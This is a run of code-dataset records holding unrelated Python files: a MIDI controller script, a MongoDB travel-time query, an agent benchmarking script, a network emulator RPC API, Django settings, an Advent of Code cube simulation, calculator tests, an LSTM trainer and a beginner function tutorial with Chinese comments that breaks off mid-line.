self.map_mixer_controls_for_current_track()\r\n\r\n\tdef attempt_connection_with_device(self):\r\n\t\tself.log_message(\"Attempting to connect to OP-1... 
(num_retries: %s)\" % self.retries_count)\r\n\t\tself.retries_count += 1\r\n\t\tself.next_retry_ts = time.time() + self.next_retry_delay\r\n\t\tself.next_retry_delay *= 2\r\n\t\tself._send_midi(ID_SEQUENCE)\r\n\r\n\tdef handle_device_connection_success(self):\r\n\t\tself.device_connected = True\r\n\t\tself.retries_count = 0\r\n\t\tself.log_message(\"OP-1 Connected\")\r\n\t\tself._send_midi(ENABLE_SEQUENCE)\r\n\r\n\tdef disconnect(self):\r\n\t\tself.log_message(\"disconnect()\")\r\n\t\tself.retries_count = 0\r\n\t\tself.device_connected = False\r\n\t\tself._send_midi(DISABLE_SEQUENCE)\r\n\t\tsuper(OP1, self).disconnect()\r\n\r\n\tdef suggest_input_port(self):\r\n\t\treturn \"OP-1 Midi Device\"\r\n\r\n\tdef suggest_output_port(self):\r\n\t\treturn \"OP-1 Midi Device\"\r\n\r\n\t#\r\n\t# Debug utils\r\n\t#\r\n\r\n\tdef param_value_updated(self, param):\r\n\t\tself.log_message('Param update: %s(%s)' % (param.name, param.value))\r\n\t\tself.log_message(' value_items: %s' % (list(param.value_items), ))\r\n\r\n\tdef debug_button_handler(self, value, *args, **kwargs):\r\n\t\tself.log_message('button: %s' % value)\r\n\r\n\tdef debug_note_handler(self, value, *args, **kwargs):\r\n\t\tself.log_message('note: %s' % value)\r\n\r\n\tdef handle_nonsysex(self, midi_bytes):\r\n\t\tsuper(OP1, self).handle_nonsysex(midi_bytes)\r\n\t\tchannel, identifier, value, is_pitchbend = midi_bytes_to_values(midi_bytes)\r\n\t\tif not is_pitchbend:\r\n\t\t\tself.log_message('midi ch:%s value:%s(%s)' % (channel, identifier, value))\r\n\r\n","sub_path":"OP1.py","file_name":"OP1.py","file_ext":"py","file_size_in_byte":18729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198406632","text":"from datetime import datetime\nfrom query_setup import collection\n\n\n# Query 3:\n# Single-Day Station Travel Times: Find travel time for station Foster NB for 5-minute \n# intervals for Sept 22, 2011. 
Report travel time in seconds.\n\n\n# Get total travel time for Foster NB\ndef foster_nb_travel_time(start, end):\n total_length = 0\n length = 0\n total_speed = 0\n speed = 0\n num_speeds = 0\n avg_speed = 0 \n # Query for Foster NB and given start/end times \n criteria = {\n \"location.stationname\": \"Foster NB\",\n \"recorded.datetimerecorded\": {\n \"$gte\": start.timestamp() * 1000,\n \"$lte\": end.timestamp() * 1000\n }\n }\n \n # Loop through each document/entry in the collection with the given criteria\n for document in collection.find(criteria): \n # Add length if it isn't null \n length = document[\"location\"][\"stationlength\"]\n if length is not None:\n total_length += length\n # Add speed if it isn't null\n speed = document[\"recorded\"][\"speed\"]\n if speed is not None:\n total_speed += speed \t \n num_speeds += 1\n\n # Calculate average speed \n avg_speed = total_speed/num_speeds\n # Returns total travel time in seconds \t\n return (total_length/avg_speed)*3600 \n \n\n# Get total travel time in seconds for each 5 minute interval for 24 hours from station Foster NB\ndef query3():\n hour = 0\n # Time constants\n min_per_hour = 60\n hours_per_day = 24\n \n # For each hour in the day \n for hour in range(0, hours_per_day):\n # For each 5 minute interval\n for minute in range(0, min_per_hour, 5):\n\n start = datetime(2011, 9, 22, hour, minute); \n \n # Edge cases at end of the hour\n if(minute <= 50):\n end = datetime(2011, 9, 22, hour, minute + 5);\n if(minute == 55 and hour < hours_per_day - 1):\n end = datetime(2011, 9, 22, hour + 1, 0)\n\n # Move to next hour \n if(minute >= 60):\n hour += 1\n minute = 0\n end = datetime(2011, 9, 22, hour, minute) \n\n print(\"Start time: \" + str(start))\n print(\"End time: \" + str(end))\n print()\n print(\"Travel time for this interval (in seconds): \" + str(foster_nb_travel_time(start, end)))\n print()\n print()\n # Increment start to next interval \n start = end\n \n\n\n return \n\n# Run query \nquery3()\n\n","sub_path":"query3.py","file_name":"query3.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"347468901","text":"import concurrent.futures\r\nimport math\r\nimport pickle\r\nimport numpy as np\r\nimport importlib\r\nfrom datetime import datetime\r\nfrom pathlib import Path\r\nfrom python.src import Utility, HelperFunctions\r\nfrom statistics import NormalDist\r\n\r\n# adjustable values\r\nnum_trials = 100\r\nnum_cycles = 10000\r\nfloating_precision_factor = 25\r\n\r\n# set and confirm paths for saved data\r\ndata_dir_path = Utility.get_data_path()\r\nPath(data_dir_path).mkdir(parents=True, exist_ok=True)\r\napiq_dict_path = data_dir_path.joinpath('apiq_dict.apiq')\r\n\r\n# import agents and environments\r\nagent_module = importlib.import_module(\"python.src.agents\")\r\nenvironment_module = importlib.import_module(\"python.src.environments\")\r\nagent_classes = {getattr(agent_module, class_name) for class_name in agent_module.__all__}\r\nenvironment_classes = {getattr(environment_module, class_name) for class_name in environment_module.__all__}\r\n\r\n# Loads already evaluated agent-environment combinations into reward dict\r\nreward_dict = {}\r\nfor ag_class in agent_classes:\r\n ag = ag_class.__name__\r\n for env_class in environment_classes:\r\n env = env_class.__name__\r\n Utility.nested_set(reward_dict, [ag, env, \"positive\", \"rewards\"], [])\r\n Utility.nested_set(reward_dict, [ag, env, \"negative\", \"rewards\"], [])\r\n 
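# Rewards saved by a previous run are reloaded here, so already-trialed agent-environment\r\n # pairs can be skipped when the list of pairs to trial is built further down.\r\n 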
path = data_dir_path.joinpath(ag + \"_\" + env + \".apiq\")\r\n if path.is_file():\r\n rewards = pickle.load(path.open(\"rb\"))\r\n Utility.nested_set(reward_dict, [ag, env], rewards)\r\n\r\n# calculate complexities of environments and compile in dict sorted by complexity\r\ncomplexity_dict = {}\r\nfor environment_class in environment_classes:\r\n complexity = HelperFunctions.calculate_complexity(environment_class())\r\n complexity_dict[environment_class.__name__] = complexity\r\ncomplexity_dict = {k: v for k, v in sorted(complexity_dict.items(), key=lambda item: item[1])}\r\n\r\n# calculate discrete distribution, continuous distribution and scaling factors\r\ncomplexities = complexity_dict.values()\r\nmax_c = max(complexities)\r\nmin_c = min(complexities)\r\ndiscrete_distribution = [0] * (max_c + 1)\r\nfor value in complexity_dict.values():\r\n discrete_distribution[value] += 1\r\nsigma = math.sqrt((max_c - min_c + 1) / len(complexities))\r\nnormal_distribution = [NormalDist(0, sigma).pdf(x) for x in range(math.floor(-3 * sigma), math.ceil(3 * sigma))]\r\nhalf_len = math.floor(len(normal_distribution) / 2)\r\ncontinuous_distribution = np.convolve(discrete_distribution, normal_distribution)\r\ncontinuous_distribution = continuous_distribution[half_len:-half_len + 1]\r\nscaling_factor_dict = {}\r\nfor k, v in complexity_dict.items():\r\n scaling_factor_dict[k] = 1 / continuous_distribution[v]\r\n\r\n# calculate pairs to be trialed\r\nagent_environment_pairs = set()\r\nfor agent_class in agent_classes:\r\n ag_name = agent_class.__name__\r\n reward_dict.setdefault(ag_name, {})\r\n for environment_class in environment_classes:\r\n if len(reward_dict[ag_name][environment_class.__name__][\"positive\"][\"rewards\"]) == 0:\r\n agent_environment_pairs.add((agent_class, environment_class))\r\n\r\n# parallel execution of trials of agents in environments\r\ntime_start = datetime.now()\r\nprint(\"----------------------------------------\")\r\nprint(\"Trialing agents in environments...\")\r\nwith concurrent.futures.ProcessPoolExecutor() as executor:\r\n future_list = []\r\n seed = 1\r\n a, m = 48271, (pow(2, 31) - 1)\r\n for pair in agent_environment_pairs:\r\n future_list.append(executor.submit(HelperFunctions.trial, pair, \"0\", num_trials, num_cycles, seed))\r\n seed = (seed * a) % m\r\n future_list.append(executor.submit(HelperFunctions.trial, pair, \"1\", num_trials, num_cycles, seed))\r\n seed = (seed * a) % m\r\n idx = 1\r\n for future in concurrent.futures.as_completed(future_list):\r\n ag_name, env_name, sign, rewards = future.result()\r\n reward_dict[ag_name][env_name][sign][\"rewards\"] = rewards\r\n print(\" {:d}/{:d} done.\".format(idx, len(future_list)))\r\n idx += 1\r\ntime_end = datetime.now()\r\n\r\n# calculate mean and std of rewards and add them to reward dictionary\r\nfor ag_name in reward_dict:\r\n for env_name in reward_dict[ag_name]:\r\n for sign in [\"positive\", \"negative\"]:\r\n collected_rewards = reward_dict[ag_name][env_name][sign][\"rewards\"]\r\n reward_dict[ag_name][env_name][sign][\"mean\"] = np.mean(collected_rewards)\r\n reward_dict[ag_name][env_name][sign][\"error\"] = np.std(collected_rewards, dtype=np.float64, ddof=1)\r\n\r\n# calculate apiq_dict\r\napiq_dict = {}\r\nnorming_factor = sum(scaling_factor_dict.values())\r\nfor ag_name in reward_dict:\r\n apiq_mean = 0\r\n apiq_error = 0\r\n for env_name in reward_dict[ag_name]:\r\n ag_env_dict = reward_dict[ag_name][env_name]\r\n factor = scaling_factor_dict[env_name]\r\n positive_mean = 
ag_env_dict[\"positive\"][\"mean\"]\r\n p_err = ag_env_dict[\"positive\"][\"error\"]\r\n negative_mean = ag_env_dict[\"negative\"][\"mean\"]\r\n n_err = ag_env_dict[\"negative\"][\"error\"]\r\n apiq_mean += (positive_mean + negative_mean) * factor\r\n apiq_error += (p_err * p_err + n_err * n_err) * factor * factor\r\n apiq_mean /= norming_factor\r\n apiq_error = np.sqrt(apiq_error) / norming_factor\r\n Utility.nested_set(apiq_dict, [ag_name, \"mean\"], apiq_mean)\r\n Utility.nested_set(apiq_dict, [ag_name, \"error\"], apiq_error)\r\n\r\n# print and save complexities\r\nprint(\"----------------------------------------\")\r\nprint(\"Complexitiy - Number of Bytecode instructions:\")\r\nfor k in complexity_dict:\r\n print(\" {:s}: {:d}\".format(k, complexity_dict[k]))\r\ncomplexity_dict_path = data_dir_path.joinpath(\"complexity_dict.apiq\")\r\npickle.dump(complexity_dict, complexity_dict_path.open(\"wb\"))\r\n\r\n# print and save scaling_factors\r\n# save environment distributions\r\nprint(\"----------------------------------------\")\r\nprint(\"Scaling Factor - Inverse of density function:\")\r\nfor k in scaling_factor_dict:\r\n print(\" {:s}: {:f}\".format(k, scaling_factor_dict[k]))\r\nscaling_factor_dict_path = data_dir_path.joinpath(\"scaling_factor_dict.apiq\")\r\npickle.dump(complexity_dict, scaling_factor_dict_path.open(\"wb\"))\r\ndiscrete_distribution_path = data_dir_path.joinpath(\"discrete_distribution.apiq\")\r\npickle.dump(discrete_distribution, discrete_distribution_path.open(\"wb\"))\r\ncontinuous_distribution_path = data_dir_path.joinpath(\"continuous_distribution.apiq\")\r\npickle.dump(continuous_distribution, continuous_distribution_path.open(\"wb\"))\r\n\r\n# save rewards in separate files for easy reuse\r\nfor ag_name in reward_dict:\r\n for env_name in reward_dict[ag_name]:\r\n data_path = data_dir_path.joinpath(ag_name + \"_\" + env_name + \".apiq\")\r\n pickle.dump(reward_dict[ag_name][env_name], data_path.open(\"wb\"))\r\n\r\n# sort, print and save reward dict\r\nprint(\"----------------------------------------\")\r\nprint(\"Positive and negative rewards:\")\r\nprint(time_end - time_start)\r\nagent_list = [\"PiRand\", \"PiBasic\", \"Pi2Back\", \"Pi2Forward\", \"Handcrafted\", \"NNsigmoid\", \"NNsigmoid4\", \"NNrelu\",\r\n \"NNrelu4\", \"NNreluSigmoid\", \"NNrelu4Sigmoid\"]\r\nagent_list.extend([k for k in reward_dict if k not in agent_list])\r\nUtility.sort_dict(reward_dict, agent_list)\r\nenvironment_list = [k for k in complexity_dict]\r\nfor a in reward_dict:\r\n Utility.sort_dict(reward_dict[a], environment_list)\r\nfor a in reward_dict:\r\n print(\" {}:\".format(a))\r\n for e in reward_dict[a]:\r\n temp = reward_dict[a][e]\r\n positive = temp[\"positive\"][\"mean\"]\r\n negative = temp[\"negative\"][\"mean\"]\r\n p_err = temp[\"positive\"][\"error\"]\r\n n_err = temp[\"negative\"][\"error\"]\r\n print(\" {:s}: {:.5f} +- {:.5f}, {:.5f} +- {:.5f}\".format(e, positive, p_err, negative, n_err))\r\nreward_dict_path = data_dir_path.joinpath(\"reward_dict.apiq\")\r\npickle.dump(reward_dict, reward_dict_path.open(\"wb\"))\r\n\r\n# print and save apiq\r\nprint(\"----------------------------------------\")\r\nprint(\"APIQ:\")\r\nUtility.sort_dict(apiq_dict, agent_list)\r\nfor a in apiq_dict:\r\n print(\" {:s}: {:.5f} +- {:.5f}\".format(a, apiq_dict[a][\"mean\"], apiq_dict[a][\"error\"]))\r\npickle.dump(apiq_dict, 
apiq_dict_path.open(\"wb\"))\r\n\r\n\r\n","sub_path":"python/src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54673709","text":"\"\"\"\nCopyright (c) 2015 SONATA-NFV\nALL RIGHTS RESERVED.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nNeither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]\nnor the names of its contributors may be used to endorse or promote\nproducts derived from this software without specific prior written\npermission.\n\nThis work has been performed in the framework of the SONATA project,\nfunded by the European Commission under Grant number 671517 through\nthe Horizon 2020 and 5G-PPP programmes. The authors would like to\nacknowledge the contributions of their colleagues of the SONATA\npartner consortium (www.sonata-nfv.eu).\n\"\"\"\n\"\"\"\nDistributed Cloud Emulator (dcemulator)\nNetworking and monitoring functions\n(c) 2015 by Steven Van Rossem \n\"\"\"\n\nimport logging\nimport threading\nimport zerorpc\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass ZeroRpcApiEndpointDCNetwork(object):\n \"\"\"\n Simple API endpoint that offers a zerorpc-based\n interface. This interface will be used by the\n default command line client.\n It can be used as a reference to implement\n REST interfaces providing the same semantics,\n like e.g. OpenStack compute API.\n \"\"\"\n\n def __init__(self, listenip, port, DCNetwork=None):\n if DCNetwork :\n self.connectDCNetwork(DCNetwork)\n self.ip = listenip\n self.port = port\n logging.debug(\"Created monitoring API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def connectDCNetwork(self, net):\n self.net = net\n logging.info(\"Connected DCNetwork to API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def start(self):\n thread = threading.Thread(target=self._api_server_thread, args=())\n thread.daemon = True\n thread.start()\n logging.debug(\"Started API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def _api_server_thread(self):\n s = zerorpc.Server(DCNetworkApi(self.net))\n s.bind(\"tcp://%s:%d\" % (self.ip, self.port))\n s.run()\n\n def stop(self):\n logging.info(\"Stop the monitoring API endpoint\")\n return\n\n\nclass DCNetworkApi(object):\n \"\"\"\n The networking and monitoring commands need the scope of the\n whole DC network to find the requested vnf. So this API is intended\n to work with a DCNetwork.\n Just pass through the corresponding request to the\n selected data center network. 
Do not implement provisioning\n    logic here because we will have multiple API\n    endpoint implementations at the end.\n    \"\"\"\n\n    def __init__(self, net):\n        self.net = net\n\n    def network_action_start(self, vnf_src_name, vnf_dst_name, kwargs):\n        # call DCNetwork method, not really datacenter specific API for now...\n        # provided dc name needs to be part of API endpoint\n        # no check if vnfs are really connected to this datacenter...\n        logging.debug(\"RPC CALL: network chain start\")\n        try:\n            c = self.net.setChain(\n                vnf_src_name, vnf_dst_name,\n                vnf_src_interface=kwargs.get('vnf_src_interface'),\n                vnf_dst_interface=kwargs.get('vnf_dst_interface'),\n                cmd='add-flow',\n                weight=kwargs.get('weight'),\n                match=kwargs.get('match'),\n                bidirectional=kwargs.get('bidirectional'),\n                cookie=kwargs.get('cookie'))\n            return str(c)\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    def network_action_stop(self, vnf_src_name, vnf_dst_name, kwargs):\n        # call DCNetwork method, not really datacenter specific API for now...\n        # provided dc name needs to be part of API endpoint\n        # no check if vnfs are really connected to this datacenter...\n        logging.debug(\"RPC CALL: network chain stop\")\n        try:\n            c = self.net.setChain(\n                vnf_src_name, vnf_dst_name,\n                vnf_src_interface=kwargs.get('vnf_src_interface'),\n                vnf_dst_interface=kwargs.get('vnf_dst_interface'),\n                cmd='del-flows',\n                weight=kwargs.get('weight'),\n                match=kwargs.get('match'),\n                bidirectional=kwargs.get('bidirectional'),\n                cookie=kwargs.get('cookie'))\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    # setup the rate measurement for a vnf interface\n    def setup_metric(self, vnf_name, vnf_interface, metric):\n        logging.debug(\"RPC CALL: setup metric\")\n        try:\n            c = self.net.monitor_agent.setup_metric(vnf_name, vnf_interface, metric)\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    # remove the rate measurement for a vnf interface\n    def stop_metric(self, vnf_name, vnf_interface, metric):\n        logging.debug(\"RPC CALL: stop metric\")\n        try:\n            c = self.net.monitor_agent.stop_metric(vnf_name, vnf_interface, metric)\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    # setup the flow metrics measurement\n    def setup_flow(self, vnf_name, vnf_interface, metric, cookie):\n        logging.debug(\"RPC CALL: setup flow\")\n        try:\n            c = self.net.monitor_agent.setup_flow(vnf_name, vnf_interface, metric, cookie)\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    # remove the flow metrics measurement\n    def stop_flow(self, vnf_name, vnf_interface, metric, cookie):\n        logging.debug(\"RPC CALL: stop flow\")\n        try:\n            c = self.net.monitor_agent.stop_flow(vnf_name, vnf_interface, metric, cookie)\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return ex.message\n\n    # do prometheus query\n    def prometheus(self, dc_label, vnf_name, vnf_interface, query):\n        logging.debug(\"RPC CALL: query prometheus\")\n        vnf_status = self.net.dcs.get(dc_label).containers.get(vnf_name).getStatus()\n        uuid = vnf_status['id']\n        query = query.replace('<uuid>', uuid)\n        # if needed, replace interface id with emu-intfs name\n        # query = query.replace('<intf>', vnf_interface)\n        logging.info('query: {0}'.format(query))\n        try:\n            c = self.net.monitor_agent.query_Prometheus(query)\n            return c\n        except Exception as ex:\n            logging.exception(\"RPC error.\")\n            return 
ex.message\n\n\n\n","sub_path":"src/emuvim/api/zerorpc/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38108801","text":"import os\r\nDEBUG = True\r\nDEBUG_PROPAGATE_EXCEPTIONS = True\r\nTEMPLATE_DEBUG = DEBUG\r\nLANGUAGE_CODE = 'ja'\r\nDEFAULT_CHARSET = 'utf-8'\r\nDEFAULT_FROM_EMAIL = 'webmaster@example.com'\r\nROOT_URLCONF = 'urls'\r\nROOT_PATH = os.path.dirname(__file__)\r\nTEMPLATE_DIRS = (ROOT_PATH + '/template')\r\nUSE_I18N = False","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492091898","text":"from typing import NamedTuple\nfrom dataclasses import dataclass\nfrom itertools import product\nimport numpy as np\n\n\nSAMPLE = \"\"\".#.\n..#\n###\"\"\"\n\nCUBEMAP = \"\"\"...###.#\n#.#.##..\n.##.##..\n..##...#\n.###.##.\n.#..##..\n.....###\n.####..#\"\"\"\n\n@dataclass\nclass Cube(dict):\n x: int\n y: int\n z: int\n state: bool\n search_space: tuple \n \n @staticmethod\n def create(x0: int, y0: int, z0: int, start_state: bool):\n search_space = [-1, 0, 1]\n search_space = tuple((x, y, z) for x in search_space \n for y in search_space \n for z in search_space \n if (x, y, z) != (0, 0, 0)\n )\n return Cube(x0, y0, z0, start_state, search_space)\n \n def __repr__(self):\n return f\"{self.state} Cube({self.x}, {self.y}, {self.z})\"\n \n @property\n def show(self):\n if self.state is True:\n return \"#\"\n else:\n return \".\"\n \n def true_neighbors(self, fullmap: np.array):\n \"\"\"Count the number of activated cubes within the neighboring 3D zone\"\"\"\n neighbor_states = []\n \n for vec in self.search_space:\n cur = {\"x\": self.x + vec[0],\n \"y\": self.y + vec[1],\n \"z\": self.z + vec[2]}\n \n interior_x = (0 <= cur[\"x\"] < fullmap.shape[0])\n interior_y = (0 <= cur[\"y\"] < fullmap.shape[1])\n interior_z = (0 <= cur[\"z\"] < fullmap.shape[2])\n \n if all([interior_x, interior_y, interior_z]):\n vec_state = fullmap[cur[\"x\"], cur[\"y\"], cur[\"z\"]].state\n neighbor_states.append(vec_state)\n return sum(neighbor_states)\n \n def turn_on(self):\n self.state = True\n return self\n \n \n@dataclass\nclass CubeMap(dict):\n grid: np.array\n full_dim: int \n \n @staticmethod\n def read_map(raw_data: str, turns=8):\n \"\"\"Instantiate a map from a string with a 2D layer \n that sits half-way through the Z-coordinate space\n \"\"\"\n data = [[True if x == \"#\" else False for x in row]\n for row in raw_data.split(\"\\n\")]\n data = [[Cube.create(x + turns, y + turns, turns, val) \n for y, val in enumerate(row)] \n for x, row in enumerate(data)]\n width = len(data[0])\n height = len(data)\n max_size = 2*turns + max(width, height)\n full_grid = product(range(max_size), range(max_size), range(max_size))\n canvas = np.array([Cube.create(x, y, z, False) for x, y, z in full_grid]\n ).reshape(max_size, max_size, max_size) \n canvas[turns: turns+width, turns: turns+height, turns] = data\n return CubeMap(grid=canvas, full_dim=max_size)\n \n def __repr__(self):\n return f\"CubeMap{self.grid.shape}\"\n \n @property\n def blank_canvas(self):\n dim = self.full_dim\n full_grid = product(range(dim), range(dim), range(dim))\n canvas = np.array([Cube.create(x, y, z, False) for x, y, z in full_grid]\n ).reshape(dim, dim, dim)\n return canvas\n \n @property\n def all_states(self):\n return np.vectorize(lambda x: 
x.state)(self.grid)\n \n @property\n def neighbor_states(self):\n return np.vectorize(lambda x: x.true_neighbors(self.grid))(self.grid)\n \n @property\n def count(self):\n return np.sum(self.all_states)\n\n def cycle_once(self):\n \"\"\"Simultaneously follow these 3 rules for every cube in the grid:\n 1) if ON & (2 or 3 ON neighbors): stay ON\n 2) if OFF & (exactly 3 ON neighbhors): turn ON\n 3) otherwise turn/stay OFF\n \"\"\"\n grid = self.grid\n \n two_or_three = np.logical_or(self.neighbor_states == 2, self.neighbor_states == 3)\n stay_on = np.logical_and(self.all_states == True, two_or_three)\n \n turn_on = np.logical_and(self.all_states == False, self.neighbor_states == 3)\n \n new_grid = self.blank_canvas.copy()\n if stay_on.any():\n new_grid[stay_on] = np.vectorize(lambda x: x.turn_on())(grid[stay_on])\n if turn_on.any():\n new_grid[turn_on] = np.vectorize(lambda x: x.turn_on())(grid[turn_on])\n self.grid = new_grid\n print(f\"Total Activated: {self.count}\")\n return self\n \n def cycle_many(self, k):\n for _ in range(k):\n self.cycle_once()\n return self.count\n \n def show(self):\n \"\"\"Render a printable display w/ matching notation to the examples\"\"\"\n xs, ys, zs = np.where(galaxy.all_states == True)\n \n smaller = self.grid[min(xs):max(xs)+1, min(ys): max(ys)+1, min(zs): max(zs)+1].copy() \n smaller = np.vectorize(lambda x: x.show)(smaller)\n \n for i in range(smaller.shape[2]):\n \n print(f\"z={i - smaller.shape[2] // 2}\")\n plane = smaller[:, :, i]\n result = '\\n'.join([''.join(row) for row in plane])\n print(result, \"\\n\")\n \n return\n \n \ngalaxy = CubeMap.read_map(SAMPLE)\n#galaxy.show()\nassert galaxy.cycle_many(6) == 112\n\n \nif __name__ == \"__main__\":\n galaxy = CubeMap.read_map(CUBEMAP)\n print(galaxy.cycle_many(6))\n ","sub_path":"day17/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"371729468","text":"import pytest\n\nfrom lab_11.tasks.tools.calculator import (\n Calculator,\n CalculatorError,\n EmptyMemory,\n NotNumberArgument,\n WrongOperation,\n)\n\ntest_run_data = [\n (\"+\", 1, 2, 3),\n (\"-\", 1, 2, -1),\n (\"*\", 1, -2, -2),\n (\"/\", 1, -2, -0.5),\n]\n\ntest_run__invalid_data = [\n (\"^\", 1, 2, WrongOperation),\n (\"-\", \"foo\", 2, NotNumberArgument),\n (\"*\", 1, \"bar\", NotNumberArgument),\n (\"/\", 1, 0, CalculatorError),\n (\"/\", 1, 0.0, CalculatorError),\n (\"/\", 2, None, EmptyMemory),\n]\n\n\n@pytest.fixture(scope=\"function\")\ndef calculator():\n print(\"\\nNew calculator...\")\n return Calculator()\n\n\n@pytest.mark.parametrize(\"operator,arg1,arg2,expected\", test_run_data)\ndef test_run_valid_operations(operator, arg1, arg2, expected, calculator):\n result = calculator.run(operator, arg1, arg2)\n assert result == expected\n\n\n@pytest.mark.parametrize(\"operator,arg1,arg2,expected\", test_run__invalid_data)\ndef test_run_invalid_data_raises_exceptions(operator, arg1, arg2, expected, calculator):\n with pytest.raises(expected):\n calculator.run(operator, arg1, arg2)\n\n\ndef test_memory_functionality(calculator: \"Calculator\"):\n calculator.run(\"+\", 1, 2)\n assert calculator._short_memory == 3\n calculator.memorize()\n assert calculator.memory == 3\n calculator.clean_memory()\n with pytest.raises(EmptyMemory):\n calculator.in_memory()\n with pytest.raises(EmptyMemory):\n 
calculator.memory\n","sub_path":"lab_11/tasks/tests/test_task1.py","file_name":"test_task1.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"448402529","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom sklearn.metrics import f1_score\n\nclass LSTMClassifier(nn.Module):\n\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim, device):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.layer_dim = layer_dim\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\n # self.fc1 = nn.Linear(hidden_dim, hidden_dim)\n # self.fc2 = nn.Linear(hidden_dim, hidden_dim)\n self.fc_out = nn.Linear(hidden_dim, output_dim)\n self.batch_size = None\n self.hidden = None\n self.device = device\n\n def forward(self, x):\n h0, c0 = self.init_hidden(x)\n out, (hn, cn) = self.rnn(x, (h0, c0))\n out = out[:, -1, :]\n # out = F.relu(self.fc1(out))\n # out = F.relu(self.fc2(out))\n out = self.fc_out(out)\n return out\n\n def init_hidden(self, x):\n h0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim)\n c0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim)\n return [t.to(self.device) for t in (h0, c0)]\n\ndef Trainer(model, trn_dl, val_dl, n_epochs, sched, opt, criterion, device, patience, dst_path=\"best.pth\"):\n print('Start model training')\n print(model)\n trials = 0\n best_acc = 0\n best_score = 0\n\n for epoch in range(1, n_epochs + 1):\n\n for i, (x_batch, y_batch) in enumerate(trn_dl):\n model.train()\n x_batch = x_batch.to(device)\n y_batch = y_batch.to(device)\n opt.zero_grad()\n out = model(x_batch)\n loss = criterion(out, y_batch)\n loss.backward()\n opt.step()\n sched.step()\n\n model.eval()\n correct, total = 0, 0\n total_preds, total_y = [], []\n for x_val, y_val in val_dl:\n x_val, y_val = [t.to(device) for t in (x_val, y_val)]\n out = model(x_val)\n preds = F.log_softmax(out, dim=1).argmax(dim=1)\n total += y_val.size(0)\n correct += (preds == y_val).sum().item()\n\n total_preds.append(preds)\n total_y.append(y_val)\n\n acc = correct / total\n total_preds = np.concatenate([p.to(\"cpu\") for p in total_preds])\n total_y = np.concatenate([y.to(\"cpu\") for y in total_y])\n score = f1_score(total_y, total_preds, average=\"macro\")\n\n if epoch % 10 == 0:\n print(f'Epoch: {epoch:3d}. Loss: {loss.item():.4f}. 
F1 score: {score:2.2%}, Acc.: {acc:2.2%}')\n\n if score > best_score:\n trials = 0\n best_score = score\n torch.save(model.state_dict(), dst_path)\n print(f'Epoch {epoch} best model saved with f1_score: {best_score:2.2%}')\n else:\n trials += 1\n if trials >= patience:\n print(f'Early stopping on epoch {epoch}')\n break\n\n return best_score","sub_path":"deep_ts.py","file_name":"deep_ts.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"137158617","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @Date: 2018-04-29 13:23\n\n# 函数的参数\n\n'''\n 定义函数时,小括号里面的变量称为形参\n 调用该函数时,小括号里面传递进去的数据为实参 \n 实参与形参的对应的\n'''\n\n# 定义一个函数,用来求两个数的和\n# 函数调用时.传递进来的数据(实参)与定义函数中的变量(形参)是一一对应的(即参数个数与参数顺序都对应)\ndef add2num(x,y):\n sum = x + y\n print(\"两个数的和:sum = %d\"%sum)\n print(\"%d + %d = %d\"%(x,y,sum))\n # return sum :在函数中有return时,是把这个函数的结果返回回去,\n # 外界在调用这个函数时需要一个变量来接受这个函数返回的结果\n return sum\n\nresult1 = add2num(5,4)\n\n# 调用函数时可以指定形参的值\nresult2 = add2num(x=4,y=5)\n\n# 练习:计算1~ 的指定数据的累积和\ndef sumNums(endNum):\n i = 0\n sum = 0\n while i <= endNum:\n sum = sum + i\n i += 1\n return sum \nresult = 